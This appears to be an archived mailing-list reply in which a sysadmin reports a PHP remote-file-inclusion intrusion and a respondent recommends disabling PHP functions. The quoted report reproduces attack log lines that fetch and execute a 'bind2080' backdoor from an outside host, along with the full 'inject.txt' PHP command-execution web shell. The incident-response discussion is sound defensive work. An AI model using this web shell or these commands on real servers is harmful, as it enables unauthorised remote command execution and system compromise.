[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Hack attempt
Not really an exploit IMO. It is a feature in PHP which you should
disable if you don't use it. (Edit php.ini OR httpd.conf and add a
disable_functions directive). You shouldn't be too worried, the 'hacker'
can't get access to anything that the web server user doesn't have
access to, but don't take any chances either. (a simple rm -rf can wipe
you out and leave you wishing you had backups)
* Norbert Crettol (norbert.crettol@idiap.ch) wrote:
> Hi all.
>
> This is my first post here. I'm Norbert Crettol, one of the sysadmins
> of Idiap, a research center in Switzerland (www.idiap.ch).
>
> We've had a undesired visitor, last night, that I discovered in the
> reports of tripwire.
>
> Here are the logs we got (we get a remote copy of the web server logs
> in another host). As of the second line, I've stripped the head and
> the tail of the line which is allways the same.
> --- begin ---
> "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
> --- end ---
> I've seen no other
>
> It looks like bind8080 has created a directory /var/lock/.tmp
> and expanded an (owned by the web server owner) archive there. Here
> is the list of the files :
> 3225 jui 20 03:53 c-leet
> 15 jui 20 03:47 c-leet.dir
> 51 jui 20 03:47 cron.d
> 512 mai 12 2002 doc/
> 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> 2523568 mai 12 2002 eggdrop-1.6.10*
> 512 mai 12 2002 filesys/
> 343 fév 11 03:55 fuck*
> 512 mai 12 2002 help/
> 21149 nov 4 2003 kik*
> 1024 jui 21 11:00 language/
> 512 mai 12 2002 logs/
> 6 jui 20 03:48 pid.CaEm-
> 23065 jan 29 15:00 proc*
> 6 jui 20 03:48 psybnc.pid
> 28591 mai 12 2002 README
> 89 jui 20 03:53 run*
> 588 avr 1 10:00 run-*
> 708 avr 1 10:00 run--*
> 512 mar 31 08:12 scripts/
> 512 mai 12 2002 text/
> 2523568 mar 28 01:41 vi*
> 30293 nov 17 2002 xhide*
> 182 jui 20 03:47 y2kupdate*
>
> Here is the content of http://www.bosscalvin.com/inject.txt :
> --- begin ---
> <font color="red">
> <br><font face="Comic Sans MS" size="2"><center>
> <b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
> <b>#</b> CMD PHP : <br>
> <b>#</b> Released by : <b>SecurityCorp</b><br>
> <b>#</b> Edited by CaEm
> <br>
> <br>
> <hr color="red" width=751px height=115px>
> <br>
> <pre><font face="Verdana" size="1">
> <?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) @chdir($chdir);
> ob_start();
> system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> $output = ob_get_contents();
> ob_end_clean();
> if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
> ?>
> </font></pre>
> <br>
> <hr color="red" width=751px height=115px>
> <br>
> <font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
> --- end ---
>
> Has someone seen this kind of attack ? (chkrootkit doesn't detect it).
> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> the uploaded scripts.
>
> Norbert
>
--
lynx -dump www.infiltrated.net/wtf |
grep "+-" |
sed 's/\\//g;s/\// /g;s/\&//;s/-/ /g' |
awk '{print $2,$3,$4,$5}' |
sed 's/ //g'
- References:
- Hack attempt
- From: Norbert Crettol <norbert.crettol@idiap.ch>